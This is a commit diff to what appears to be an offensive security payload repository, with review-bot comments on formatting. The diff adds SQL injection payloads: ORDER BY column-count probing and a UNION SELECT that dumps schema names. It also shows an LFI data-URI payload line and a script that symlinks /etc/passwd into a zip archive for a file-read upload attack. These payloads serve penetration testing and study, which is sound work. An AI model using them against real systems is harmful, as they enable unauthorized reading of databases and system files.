Symbolic Link Zip + SQL injection ORDER BY

patch-1
Swissky 2017-07-04 23:17:59 +02:00
parent a1fbd41bbb
commit 6070ece522
4 changed files with 16 additions and 3 deletions

@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
``` ```
## Thanks to ## Thanks to
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
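
Review bot: In the added HighOn.coffee entry the label "LFI Cheat" cuts off the title that the URL slug spells out (lfi-cheat-sheet); suggest "[HighOn.coffee LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/)". The new "OWASP LFI" label is also terser than the page it points to (Testing_for_Local_File_Inclusion), so a label such as "OWASP: Testing for Local File Inclusion" would tell readers what they will find behind the link.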

@ -1,5 +1,15 @@
# MYSQL Injection # MYSQL Injection
##Detect columns number
Using a simple ORDER
```
order by 1
order by 2
order by 3
...
order by XXX
```
##MySQL Union Based ##MySQL Union Based
``` ```
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
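
Review bot: The new heading "##Detect columns number" has no space after the hashes, unlike "# MYSQL Injection" directly above it, and the intro line "Using a simple ORDER" stops before naming the clause; suggest "## Detect columns number" and "Using a simple ORDER BY". The section also never says how to read the responses to "order by 1" through "order by XXX", so add one sentence stating which response marks the column count. The unchanged "##MySQL Union Based" heading has the same spacing problem and could be fixed in the same pass.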

Binary file not shown.

@ -0,0 +1,2 @@
ln -s /etc/passwd link
zip --symlinks test.zip link
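
Review bot: The new two-line file has no comment or accompanying README text saying what test.zip is for or what "--symlinks" changes; add a comment line above "zip --symlinks test.zip link" noting that the option stores the link itself instead of the file it points to. If the binary file added in this commit is the archive these commands produce, say so next to them, so readers can rebuild it rather than rely on an unexplained binary. A "#!/bin/sh" first line, or a note that the commands are meant to be typed by hand, would also make clear whether the file is a script.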